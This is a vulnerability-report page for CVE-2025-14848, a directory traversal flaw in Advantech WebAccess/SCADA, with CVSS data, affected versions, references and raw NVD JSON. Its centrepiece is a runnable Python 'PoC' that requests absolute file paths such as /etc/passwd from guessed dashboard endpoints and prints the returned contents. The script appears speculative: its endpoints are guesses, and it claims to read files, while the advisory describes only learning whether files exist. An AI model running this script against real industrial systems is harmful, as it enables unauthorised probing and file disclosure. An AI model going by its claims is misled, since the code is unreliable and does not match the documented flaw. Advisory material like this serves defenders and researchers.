Security Vulnerability Report
中文
CVE-2025-14848 CVSS 4.3 MEDIUM

CVE-2025-14848

Published: 2025-12-18 21:15:53
Last Modified: 2025-12-31 19:49:01

Description

Advantech WebAccess/SCADA is vulnerable to absolute directory traversal, which may allow an attacker to determine the existence of arbitrary files.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:advantech:webaccess\/scada:9.2.1:*:*:*:*:*:*:* - VULNERABLE
Advantech WebAccess/SCADA < 9.2.1
Advantech WebAccess/SCADA < 8.4.5
Advantech WebAccess/SCADA < 8.4.0 (Build 2407)
Advantech WebAccess Node < 3.2.3.7717

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14848 PoC - Advantech WebAccess/SCADA Directory Traversal # Target: Advantech WebAccess/SCADA Web Interface # Vulnerability: Absolute Directory Traversal # CVSS: 4.3 (Medium) import requests import sys def test_directory_traversal(target_url, file_path): """ Test for directory traversal vulnerability in Advantech WebAccess/SCADA Args: target_url: Base URL of the target WebAccess/SCADA server file_path: Absolute path of the file to read """ # Common WebAccess/SCADA endpoints that may be vulnerable endpoints = [ '/WADashboard/api/file', '/WADashboard/api/download', '/WADashboard/api/viewer', '/WADashboard/common/file', '/WADashboard/Reports/file', '/WADashboard/Upload/file' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': '*/*' } print(f"[*] Testing target: {target_url}") print(f"[*] Attempting to read: {file_path}") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Try absolute path traversal params = {'path': file_path} try: response = requests.get(url, params=params, headers=headers, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Potential vulnerability found at {endpoint}") print(f"[+] File content preview:") print(response.text[:500]) return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") # Alternative: Try direct path parameter url = target_url.rstrip('/') + '/WADashboard/api/file' params = {'fileName': file_path} try: response = requests.get(url, params=params, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] File content retrieved via fileName parameter") print(response.text[:500]) return True except: pass print("[-] No vulnerable endpoint found or file not accessible") return False if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve-2025-14848-poc.py <target_url> <file_path>") print("Example: python cve-2025-14848-poc.py http://target.com /etc/passwd") sys.exit(1) target = sys.argv[1] file_path = sys.argv[2] test_directory_traversal(target, file_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14848", "sourceIdentifier": "[email protected]", "published": "2025-12-18T21:15:52.587", "lastModified": "2025-12-31T19:49:01.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Advantech WebAccess/SCADA\nis vulnerable to absolute directory traversal, which may allow an attacker to determine the existence of arbitrary files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-36"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:advantech:webaccess\\/scada:9.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "211D6D3C-96AE-409D-A37B-FCF2A86D6DB9"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-352-06.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.advantech.com/en-us/support/details/installation?id=1-MS9MJV", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-352-06", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}